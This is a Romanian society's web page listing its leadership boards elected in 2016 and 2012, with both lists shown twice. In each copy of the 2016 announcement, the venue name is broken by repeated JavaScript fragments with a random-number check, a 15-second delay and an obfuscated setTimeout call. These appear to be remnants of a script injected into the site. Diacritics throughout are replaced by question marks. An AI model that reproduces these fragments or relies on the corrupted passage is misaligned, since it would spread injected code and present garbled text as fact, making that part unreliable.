Organizare

Societatea romana de medicina a muncii

www.srmedicina-muncii.ro

CONSILIUL DIRECTOR AL SOCIET??II ROMÂNE DE MEDICINA MUNCII

V? inform?m c? în data de 27 mai 2016, la ora 17.00, în cadrul celui de al 18- lea Congres Na?ional de Medicina muncii, la Bucure?ti, Hotel Sheraton, Sala de conferin?? Platinum Grandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and Ballroom, Calea Doroban?i nr. 5-7, sector 1, a avut loc Adunarea General? a reprezentan?ilor membrilor Societ??ii Române de Medicina Muncii în vederea alegerii Consiliului Director al SRMM.

CONSILIUL DIRECTOR AL S.R.M.M. – 27.05.2016

PRE?EDINTE
PROF.DR.EUGENIA NAGHI
VICEPRE?EDINTE
PROF.DR.ION TOMA
VICEPRE?EDINTE
CONF.DR.AGRIPINA RA?CU
VICEPRE?EDINTE
PROF.DR.ELENA ANA P?UNCU
TREZORIER
DR.CLAUDIA-MARIANA HANDRA – ?EF LUCR?RI
MEMBRU
DR.ARMAND- GABRIEL R?JNOVEANU-?EF LUCR?RI
MEMBRU
DR.DOINA-ILEANA GIURGIU

MEMBRU
DR.STELIAN IOAN MORARIU- ?EF LUCR?RI
MEMBRU
DR.FELICIA-STELIANA POPESCU
SECRETAR
DR.IULIA CRULL

 

COMITETUL DE CONDUCERE AL SOCIET??II ROMÂNE DE MEDICINA MUNCII

Va informam ca in data de 25 mai 2012, la ora 14.00, in cadrul celui de al 16- lea Congres National de Medicina muncii, la Bucuresti, Biblioteca Academiei Romane, Amfiteatrul „Ion Heliade Radulescu”, Calea Victoriei nr. 125, sector 1, a avut loc Adunarea Generala a reprezentantilor membrilor Societatii Romane de Medicina Muncii in vederea alegerii comitetului de conducere al SRMM.

COMITETUL DE CONDUCERE AL SRMM – 25.05.2012

PRESEDINTE
PROF.DR.EUGENIA NAGHI
VICEPRESEDINTE
PROF.DR.ION TOMA

VICEPRESEDINTE
CONF.DR.AGRIPINA RASCU
VICEPRESEDINTE
PROF.DR.ELENA ANA PAUNCU
TREZORIER
DR.CLAUDIA HANDRA – ASISTENT UNIVERSITAR
MEMBRU
DR.RAZVAN IONUT-SEF LUCRARI

MEMBRU
DR.MARINA OTELEA

MEMBRU
DR.CARMEN ARTENIE

MEMBRU
DR.LILIANA RAPAS

SECRETAR
DR.IULIA CRULL

+ Conducere 2016

CONSILIUL DIRECTOR AL SOCIET??II ROMÂNE DE MEDICINA MUNCII

V? inform?m c? în data de 27 mai 2016, la ora 17.00, în cadrul celui de al 18- lea Congres Na?ional de Medicina muncii, la Bucure?ti, Hotel Sheraton, Sala de conferin?? Platinum Grandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and Ballroom, Calea Doroban?i nr. 5-7, sector 1, a avut loc Adunarea General? a reprezentan?ilor membrilor Societ??ii Române de Medicina Muncii în vederea alegerii Consiliului Director al SRMM.

CONSILIUL DIRECTOR AL S.R.M.M. – 27.05.2016

PRE?EDINTE
PROF.DR.EUGENIA NAGHI
VICEPRE?EDINTE
PROF.DR.ION TOMA
VICEPRE?EDINTE
CONF.DR.AGRIPINA RA?CU
VICEPRE?EDINTE
PROF.DR.ELENA ANA P?UNCU
TREZORIER
DR.CLAUDIA-MARIANA HANDRA – ?EF LUCR?RI
MEMBRU
DR.ARMAND- GABRIEL R?JNOVEANU-?EF LUCR?RI
MEMBRU
DR.DOINA-ILEANA GIURGIU

MEMBRU
DR.STELIAN IOAN MORARIU- ?EF LUCR?RI
MEMBRU
DR.FELICIA-STELIANA POPESCU
SECRETAR
DR.IULIA CRULL

 

+ Conducere 2012

COMITETUL DE CONDUCERE AL SOCIET??II ROMÂNE DE MEDICINA MUNCII

Va informam ca in data de 25 mai 2012, la ora 14.00, in cadrul celui de al 16- lea Congres National de Medicina muncii, la Bucuresti, Biblioteca Academiei Romane, Amfiteatrul „Ion Heliade Radulescu”, Calea Victoriei nr. 125, sector 1, a avut loc Adunarea Generala a reprezentantilor membrilor Societatii Romane de Medicina Muncii in vederea alegerii comitetului de conducere al SRMM.

COMITETUL DE CONDUCERE AL SRMM – 25.05.2012

PRESEDINTE
PROF.DR.EUGENIA NAGHI
VICEPRESEDINTE
PROF.DR.ION TOMA

VICEPRESEDINTE
CONF.DR.AGRIPINA RASCU
VICEPRESEDINTE
PROF.DR.ELENA ANA PAUNCU
TREZORIER
DR.CLAUDIA HANDRA – ASISTENT UNIVERSITAR
MEMBRU
DR.RAZVAN IONUT-SEF LUCRARI

MEMBRU
DR.MARINA OTELEA

MEMBRU
DR.CARMEN ARTENIE

MEMBRU
DR.LILIANA RAPAS

SECRETAR
DR.IULIA CRULL